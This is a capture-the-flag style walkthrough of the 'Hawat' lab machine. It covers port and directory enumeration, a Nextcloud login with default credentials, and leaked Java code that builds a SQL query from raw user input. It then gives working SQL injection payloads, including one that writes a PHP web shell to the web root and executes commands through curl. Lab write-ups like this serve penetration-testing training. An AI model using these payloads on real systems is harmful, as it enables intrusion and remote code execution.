Logo
Overview

PG: Hawat | Walkthrough

November 14, 2021
2 min read
PG/Machines Boot2Root OSCP/Prep writeups vuln/SQLI

Enumeration

Nmap

Terminal window
$ nmap $ip -p22,111,139,443,445,17445,30455,50080 -sV -oN nmapInitial.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-14 18:54 +0545
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 25.00% done; ETC: 18:55 (0:00:18 remaining)
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 25.00% done; ETC: 18:55 (0:00:36 remaining)
Nmap scan report for 192.168.206.147
Host is up (0.35s latency).
PORT      STATE  SERVICE      VERSION
22/tcp    open   ssh          OpenSSH 8.4 (protocol 2.0)
111/tcp   closed rpcbind
139/tcp   closed netbios-ssn
443/tcp   closed https
445/tcp   closed microsoft-ds
17445/tcp open   unknown
30455/tcp open   http         nginx 1.18.0
50080/tcp open   http         Apache httpd 2.4.46 ((Unix) PHP/7.4.15)

Fuzz directories on port 50080

$ gobuster dir -u http://$ip:50080/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -t 100 -x php,html,txt --no-error -q
/images               (Status: 301) [Size: 244] [--> http://192.168.206.147:50080/images/]
/index.html           (Status: 200) [Size: 9088]
/4                    (Status: 301) [Size: 239] [--> http://192.168.206.147:50080/4/]
/cloud                (Status: 301) [Size: 243] [--> http://192.168.206.147:50080/cloud/]
  • login to next cloud with admin:admin
  • download issuetracker.zip
  • less IssueController.java
@GetMapping("/issue/checkByPriority")
public String checkByPriority(@RequestParam("priority") String priority, Model model) {
        //
        // Custom code, need to integrate to the JPA
        //
    Properties connectionProps = new Properties();
    connectionProps.put("user", "issue_user");
    connectionProps.put("password", "ManagementInsideOld797");
try {
                conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker",connectionProps);
            String query = "SELECT message FROM issue WHERE priority='"+priority+"'";
    System.out.println(query);
            Statement stmt = conn.createStatement();
            stmt.executeQuery(query);


} catch (SQLException e1) {
                // TODO Auto-generated catch block
                e1.printStackTrace();
        }
// TODO: Return the list of the issues with the correct priority
        List<Issue> issues = service.GetAll();
        model.addAttribute("issuesList", issues);
        return "issue_index";
}
  • get the web root of php server from phpinfo.php on port 30455
Terminal window
$_SERVER['DOCUMENT_ROOT']  /srv/http

Exploitation

Test for sqli

POST /issue/checkByPriority?priority=Normal'+UNION+SELECT+sleep(5);+--+- HTTP/1.1
Host: 192.168.120.130:17445
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=E408CE3E9BBBEC15DCAD194F380E68A9
Upgrade-Insecure-Requests: 1

Upload simple webshell

priority=Normal' UNION SELECT (<?php echo exec($_GET["cmd"]);) INTO OUTFILE '/srv/http/cmd.php'; --

Command execution in

Terminal window
curl "http://192.168.120.130:30455/cmd.php?cmd=id"